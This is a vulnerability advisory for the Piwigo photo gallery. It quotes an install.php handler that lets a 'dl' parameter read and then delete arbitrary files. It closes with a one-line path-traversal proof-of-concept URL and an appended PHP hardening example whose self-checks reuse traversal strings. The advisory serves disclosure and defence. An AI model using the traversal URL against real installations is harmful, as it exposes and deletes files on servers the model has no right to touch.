Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script. The implementation contains security flaws that an attacker can exploit to read arbitrary files on the affected computer and to delete arbitrary files within the context of the affected application.
====================================================================

/install.php:
-------------

if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);
  unlink($filename);
  exit();
}

====================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
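As an added example (not Piwigo's code and not the vendor patch), here is a hardened replacement for the download handler quoted above: it validates the 'dl' value both syntactically and after path resolution, so the traversal value from the PoC URL is refused before anything is read or unlink()ed. The function name safe_pwg_file(), the check() helper and the temporary data directory are assumptions made for this illustration.

```php
<?php
// Added example, not Piwigo's code or its vendor patch: a hardened replacement
// for the install.php download handler. safe_pwg_file(), check() and $data_dir
// are names assumed for this illustration.

/**
 * Return the absolute path of data_dir/pwg_<dl>, or null if the request must be
 * refused. The original handler concatenated $_GET['dl'] into the path and then
 * read and unlink()ed it, so a traversal value reached any file the web server
 * user could access.
 */
function safe_pwg_file(string $data_dir, string $dl): ?string
{
    // 1. Syntactic check: a bare file name only. No slashes, backslashes,
    //    NUL bytes, percent signs or dot segments, so "../../x" is rejected
    //    before any filesystem access happens.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9_.-]*\z/', $dl) || strpos($dl, '..') !== false) {
        return null;
    }
    // 2. Semantic check: the resolved path must still lie under data_dir
    //    (a symlink dropped inside the directory could otherwise point out).
    $root = realpath($data_dir);
    $path = realpath($data_dir . DIRECTORY_SEPARATOR . 'pwg_' . $dl);
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Explicit check helper (assert() may be disabled by zend.assertions in production).
function check(bool $ok, string $what): void { if (!$ok) { fwrite(STDERR, "FAIL: $what\n"); exit(1); } }

// Self-check against a constructed temporary data directory.
$data_dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pwg_demo_' . getmypid();
mkdir($data_dir);
file_put_contents($data_dir . DIRECTORY_SEPARATOR . 'pwg_mysql', 'constructed dump');

// A legitimate value resolves to the file inside data_dir.
check(safe_pwg_file($data_dir, 'mysql') === realpath($data_dir . DIRECTORY_SEPARATOR . 'pwg_mysql'), 'valid name accepted');
// The PoC traversal value and a few variants are all refused.
foreach (['../../../../../../lio_passwords.txt', '..%2f..%2fetc/passwd', "mysql\0.txt", ''] as $bad) {
    check(safe_pwg_file($data_dir, $bad) === null, "rejected: $bad");
}
// Only a non-null return may be passed on to readfile($path) and unlink($path).
unlink($data_dir . DIRECTORY_SEPARATOR . 'pwg_mysql');
rmdir($data_dir);
echo "all checks passed\n";
```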